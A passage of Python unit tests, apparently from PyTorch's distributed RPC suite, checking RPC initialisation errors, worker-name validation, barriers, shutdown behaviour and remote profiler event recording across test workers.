@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
expect = torch.ones(2, 2) * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(torch.ones(2, 2), torch.ones(2, 2))
)
self.assertEqual(expect, result)
expect = torch.ones(3, 3) * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(torch.ones(3, 3), torch.ones(3, 3))
).wait()
self.assertEqual(expect, result)
expect = torch.ones(4, 4) * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(torch.ones(4, 4), torch.ones(4, 4))
).to_here()
self.assertEqual(expect, result)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_invalid_names(self):
from torch.distributed.rpc import WorkerInfo
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
self.assertEqual(ret, dst_rank)
@dist_init
def test_add_with_id(self):
n = self.rank + 1
dst_rank = n % self.world_size
worker_info = rpc.get_worker_info(worker_name(dst_rank))
ret = rpc.rpc_sync(
worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), n)
)
self.assertEqual(ret, (torch.ones(n, n) + n))
@dist_init
def test_async_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
n = self.rank + 1
dst_rank = n % self.world_size
x = torch.ones(self.world_size, self.world_size)
x[self.rank][self.rank] = 0
ret = rpc.rpc_sync(worker_name(dst_rank), torch.nonzero, args=(x,))
self.assertEqual(ret, x.nonzero())
@dist_init
def test_multi_rpc(self):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
def _run_uneven_workload(self, num_repeat=30):
# worker0 drives and waits for worker1 and worker2
# throughout the test.
if self.rank == 0:
self.assertTrue(self.world_size >= 3)
# Phase 1: Only worker1 has workload.
dst = "worker1"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for fut in torch.futures.collect_all(futs).wait():
self.assertEqual(fut.wait(), 0)
# Phase 2: Only worker2 has workload.
# If join is not correctly implemented,
# worker2 should be closed by now.
dst = "worker2"
futs = []
for _ in range(num_repeat):
fut = rpc.rpc_async(dst, heavy_rpc, args=(torch.ones(100, 100),))
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
def test_wait_all_workers(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
def test_wait_all_workers_twice(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload()
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some work after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
rpc.shutdown(graceful=False)
@dist_init
def test_all_gather(self):
info = rpc.get_worker_info()
results = rpc.api._all_gather(info.id)
expected = {}
for info in rpc._get_current_rpc_agent().get_worker_infos():
expected[info.name] = info.id
self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
rpc._set_rpc_timeout(0.1)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError,
"timed out in _all_gather after 0\\.10 seconds"
):
rpc.api._all_gather(SlowPickleClass(0.5))
else:
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
names = sorted(names)
leader = names[0]
rpc.rpc_sync(leader, _reset_count)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, 0)
rpc.api._barrier(names)
rpc.rpc_sync(leader, _increment_count)
rpc.api._barrier(names)
if not multi_threaded and info.name == leader:
self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
# Test rpc barrier when called with the full list of workers
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
# Test rpc barrier when processes are called with different subsets of the full list
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [worker.name for worker in all_worker_info if not worker.id % 2]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
# Test rpc barrier when some processes are not involved in the barrier
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
if info.id % 2:
names = [worker.name for worker in all_worker_info if worker.id % 2]
else:
names = [f"worker{info.id}"]
self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
# This test validates the implementation of the barrier when multiple threads call into it
# We only need to check that it does not hang in this case
info = rpc.get_worker_info()
all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
names = [worker.name for worker in all_worker_info]
threads = []
for _ in range(3):
th = threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
threads.append(th)
th.start()
for th in threads:
th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
"""Test graceful termination."""
self._run_uneven_workload()
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
# Initialize RPC.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
rpc.shutdown()
with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
@dist_init
def test_expected_src(self):
dst_rank = (self.rank + 1) % self.world_size
expected_src_rank = (self.rank - 1) % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
value = VALUE_FUTURE.result()
self.assertEqual(value, expected_src_rank)
@dist_init
def test_py_built_in(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), min, args=(n, n + 1, n + 2))
self.assertEqual(ret, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(ret, my_function(n, n + 1, n + 2))
def test_build_rpc_profiling_key(self):
# Tests that the name that shows up as an Event in profiling RPCs has all
# the necessary information.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
rpc_profiling_key = _build_rpc_profiling_key(
exec_mode, "foo", "worker0", "worker1"
)
self.assertIn(exec_mode.value, rpc_profiling_key)
self.assertIn("foo", rpc_profiling_key)
self.assertIn("worker0", rpc_profiling_key)
self.assertIn("worker1", rpc_profiling_key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
self.assertTrue(self_worker_name in rpc_event.name)
self.assertTrue(dst_worker_name in rpc_event.name)
if isinstance(func, torch.jit.ScriptFunction):
self.assertTrue(torch._jit_internal._qualified_name(func) in rpc_event.name)
else:
self.assertTrue(func.__name__ in rpc_event.name)
self.assertTrue(rpc_exec_mode.value in rpc_event.name)
self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
t1, t2 = torch.ones(100), torch.ones(100)
with torch.autograd.profiler.profile(record_shapes=True) as prof:
rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))
function_events = prof.function_events
remote_events = [event for event in function_events if event.is_remote]
remote_add_event = [
event for event in remote_events if "aten::add" in event.name
][0]
remote_add_input_shapes = remote_add_event.input_shapes
# Run profiler on equivalent local op and validate shapes are the same.
with torch.autograd.profiler.profile(record_shapes=True) as prof:
torch.add(t1, t2)
local_function_events = prof.function_events
local_add_event = [
event for event in local_function_events if "aten::add" in event.name
][0]
local_add_input_shapes = local_add_event.input_shapes
self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile(profile_memory=True) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
# if cpu_memory_usage was not propagated over the wire, this set would
# only contain 0 (indicates no memory being profiled)
self.assertNotEqual({0}, event_cpu_mem_usages)
# No memory profiled if profile_memory=False
with torch.autograd.profiler.profile(profile_memory=False) as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
function_events = p.function_events
event_cpu_mem_usages = set(event.cpu_memory_usage for event in function_events)
self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
if self.rank != 1:
return
dst = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as p:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
res = fut.wait()
events = p.function_events
with TemporaryFileName() as fname:
path = fname
p.export_chrome_trace(path)
with open(path) as f:
trace = json.load(f)
event_names = [event['name'] for event in trace]
for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
event_exists = any([expected_event_name in event_name for event_name in event_names])
self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
# tests that remote events are properly prefixed with the RPC profiling key.
if self.rank != 1:
return
# Spawn multiple threads that send RPCs to ensure keys are correctly
# prefixed when there are multiple RPCs being created/in flight at the
# same time.
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
def rpc_with_profiling(dst_worker):
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
fut.wait()
events = prof.function_events
remote_event_names = {
event.name: event for event in events if event.is_remote
}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
dst_worker,
)
remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
for name, event in remote_event_names.items():
# Ensure that we have the expected key as part of the remote
# event.
self.assertTrue(name.startswith(rpc_profiling_key))
self.assertTrue(event.is_remote)
self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
# Ensure that the remote event name also contains the operator.
operator_name_substr = name[len(rpc_profiling_key) :]
# Note: we don't assert that every remote event is in the above
# set; the set is just a representative sample of what we expect
# to see. The profiler can change and add more events, but we
# should always expect to see this representative set.
matching_event = {
remote_event_name
for remote_event_name in remote_event_name_set
if remote_event_name in operator_name_substr
}
remote_event_name_set -= matching_event
# The set should be empty, otherwise its contained elements did
# not show up in the remote profiler output.
self.assertTrue(
remote_event_name_set == set(),
f"Expected {remote_event_name_set} to be included in remote profiler output.",
)
for dst in dst_ranks:
dst_worker = worker_name(dst)
num_parallel_rpcs = 2
with concurrent.futures.ThreadPoolExecutor(
max_workers=num_parallel_rpcs
) as executor:
futs = [
executor.submit(rpc_with_profiling, dst_worker)
for _ in range(num_parallel_rpcs)
]
# Wait for workers to finish test
for fut in futs:
fut.result()
def _run_test_profiler_remote_events_profiled(self):
# Tests that we can successfully invoke the profiler on a remote node,
# and collect the remote events back in the local profiler.
if self.rank != 1:
return
dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
for dst in dst_ranks:
dst_worker = worker_name(dst)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
ret = fut.wait()
events = prof.function_events
rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
self.check_profiling_info(
worker_name(self.rank),
dst_worker,
udf_with_torch_ops,
rpc_event,
RPCExecMode.ASYNC,
)
remote_events = {event.name: event for event in events if event.is_remote}
rpc_profiling_key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
udf_with_torch_ops.__qualname__,
worker_name(self.rank),
worker_name(dst),
)
for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
self.assertTrue(expected_key in remote_events)
remote_event = remote_events[expected_key]
# Remote event should have a node ID corresponding to the worker
# it ran on.
self.assertEqual(remote_event.node_id, dst)
# Validate the order in which remote events show up in the profiling output.
def convert_remote_to_local(event_name):
remote_op_key = rpc_profiling_key + REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key)
+ len(remote_op_key) :
]
remote_events_list = [
convert_remote_to_local(event.name)
for event in events
if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
]
self.assertEqual(
set(remote_events_list),
set(EXPECTED_REMOTE_EVENTS),
f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
)
@dist_init
def test_profiler_remote_events_profiled(self):
self._run_test_profiler_remote_events_profiled()
@single_threaded_process_group_agent
@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
fut = rpc.rpc_async(
worker_name(dst),
torch.mul,
args=(
torch.tensor(1.0, requires_grad=True),
torch.tensor(1.0, requires_grad=True),
),
)
fut.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
if self.rank != 1:
return
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
with torch.autograd.profiler.profile() as prof:
ret = rpc.rpc_async(
dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
)
out = ret.wait()
function_events = prof.function_events
# slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
# recorded.
key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
)
nested_rpc_key_prefix = _build_rpc_profiling_key(
RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
)
expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
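        # For illustration only: the expected key is the outer RPC profiling key,
        # then REMOTE_OP_STR, then the nested RPC profiling key, i.e. roughly
        # "rpc_async#slow_async_add(...)#remote_op: rpc_async#slow_add(...)".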
remote_events = [event for event in function_events if event.is_remote]
rpc_remote_event = [
event for event in remote_events if event.name == expected_key
]
self.assertEqual(1, len(rpc_remote_event))
rpc_remote_event = rpc_remote_event[0]
self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
# slow_async_add's RPC does an add on dst2, which should be reflected as well.
remote_add_key = (
expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
)
remote_add_event = [
event for event in remote_events if event.name == remote_add_key
]
self.assertEqual(1, len(remote_add_event))
remote_add_event = remote_add_event[0]
# Validate that node_id is dst2.
self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@single_threaded_process_group_agent
@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
self._run_rpc_profiling_async_function()
if torch.cuda.is_available():
dist.barrier()
self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
# test that functions run over RPC with record_function show the expected
# profiled block.
if self.rank != 1:
return
dst_ranks = [i for i in range(self.world_size) if i != self.rank]
for dst_rank in dst_ranks:
dst_worker = worker_name(dst_rank)
with torch.autograd.profiler.profile() as prof:
fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
fut.wait()
function_events = prof.function_events
record_function_remote_event = [
evt for evt in function_events if "##forward##" in evt.name
]
self.assertEqual(1, len(record_function_remote_event))
record_function_remote_event = record_function_remote_event[0]
self.assertEqual(record_function_remote_event.node_id, dst_rank)
# cpu_children only returns direct children, so here we get all
# children recursively.
            def get_cpu_children(event):
                if not event.cpu_children:
                    return []
                # Copy the list so we don't mutate event.cpu_children while
                # iterating over it.
                cpu_children = list(event.cpu_children)
                for e in event.cpu_children:
                    cpu_children.extend(get_cpu_children(e))
                return cpu_children
remote_children = get_cpu_children(record_function_remote_event)
# Get local children and verify parity.
with torch.autograd.profiler.profile() as prof:
udf_with_torch_ops(-1, True)
local_function_events = prof.function_events
local_record_function_event = [
evt for evt in local_function_events if "##forward##" in evt.name
][0]
local_children = get_cpu_children(local_record_function_event)
local_children_names = [
evt.name for evt in local_children
]
REMOTE_OP_STR = "#remote_op: "
def convert_remote_to_local(event_name):
remote_op_key = REMOTE_OP_STR
return event_name[
event_name.find(remote_op_key) + len(remote_op_key) :
]
for evt in remote_children:
local_name = convert_remote_to_local(evt.name)
self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
def convert_remote_to_local(event_name):
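            # Strip everything up to and including REMOTE_OP_STR so that only the
            # local operator name remains, e.g. "...#remote_op: aten::mul" -> "aten::mul".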
return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]
events = prof.function_events
remote_events = {
convert_remote_to_local(event.name): event
for event in events
if event.is_remote
}
self.assertTrue("aten::mul" in remote_events)
remote_mul_event = remote_events["aten::mul"]
self.assertEqual(remote_mul_event.node_id, dst)
self.check_profiling_info(
worker_name(self.rank),
worker_name(dst),
torch.mul,
remote_mul_event,
RPCExecMode.ASYNC,
)
def _run_test_profiler_with_autograd_context(self):
dst = (self.rank + 1) % self.world_size
if self.rank == 1:
# Cases where we can double wrap messages with profiling information and autograd info.
with dist_autograd.context() as context_id:
with torch.autograd.profiler.profile() as prof:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
# Ensure that flipped order of ctx managers results in events being
# recorded as expected.
with torch.autograd.profiler.profile() as prof:
with dist_autograd.context() as context_id:
self.run_profiling_workload(dst)
self.validate_profiling_workload(dst, prof)
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
self._run_test_profiler_with_autograd_context()
@dist_init
def test_profiler_with_autograd_context(self):
self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
dst = dst if dst is not None else (self.rank + 1) % self.world_size
# only run profiler on rank 1.
if self.rank == 1:
with torch.autograd.profiler.profile() as prof:
record_function_ctx_mgr = (
contextlib.suppress()
if not use_record_function
else torch.autograd.profiler.record_function(
"foo"
)
)
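                # contextlib.suppress() with no arguments acts as a no-op context
                # manager here, used when use_record_function is False.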
with record_function_ctx_mgr as rf:
if rpc_exec_mode == RPCExecMode.SYNC:
rpc.rpc_sync(worker_name(dst), func, args=args)
elif rpc_exec_mode == RPCExecMode.ASYNC:
fut = rpc.rpc_async(worker_name(dst), func, args=args)
fut.wait()
else:
self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
rref = rpc.remote(worker_name(dst), func, args=args)
rref.to_here()
# To avoid flakiness, wait for the RRef to be profiled. This
# means that we received the acknowledgement of successful
# creation on the owner and ran the callbacks responsible
# for recording the profiling event.
rref._get_profiling_future().wait()
events = prof.function_events
rpc_event = get_function_event(events, rpc_exec_mode.value)
# verify Node ID for this rpc event.
self.assertEqual(rpc_event.node_id, self.rank)
# Ensure recording of remote events.
remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
self.assertGreaterEqual(len(remote_events), 1)
for remote_event in remote_events:
self.assertEqual(remote_event.node_id, dst)
if use_record_function:
scope_event = get_function_event(events, "foo")
# Since RPC call is within the scope, its CPU interval should be
# contained within foo's interval.
self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
# the sender, dest worker, function run, and type of RPC should all
# be recorded.
self_worker_name = worker_name(self.rank)
dst_worker_name = worker_name(dst)
self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
if use_record_function:
# verify order by ensuring that the outer context comes
# before the rpc event.
                foo_event_idx = next(i for i, event in enumerate(events) if "foo" in event.name)
                rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
                self.assertLess(foo_event_idx, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_sync_rpc_udf(self):
self._run_test_profiler_with_sync_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
self._run_test_profiler_with_sync_rpc_udf()
def _run_test_profiler_with_sync_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_sync_rpc_builtin(self):
self._run_test_profiler_with_sync_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_sync_rpc_builtin()
def _run_test_profiler_with_async_rpc_udf(self):
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
use_record_function=True)
@dist_init
def test_profiler_with_async_rpc_udf(self):
self._run_test_profiler_with_async_rpc_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
self._run_test_profiler_with_async_rpc_udf()
def _run_test_profiler_with_async_rpc_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
@dist_init
def test_profiler_with_async_rpc_builtin(self):
self._run_test_profiler_with_async_rpc_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
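        # An event is treated as "top level" if it starts after the end of the
        # previously recorded top-level event on the same thread. For example,
        # given intervals [1, 10], [2, 5], and [12, 20] on one thread, only
        # [1, 10] and [12, 20] are top level.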
top_level_event_names = []
for thread_local_events in process_global_events:
            # Get top-level events from all events that happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
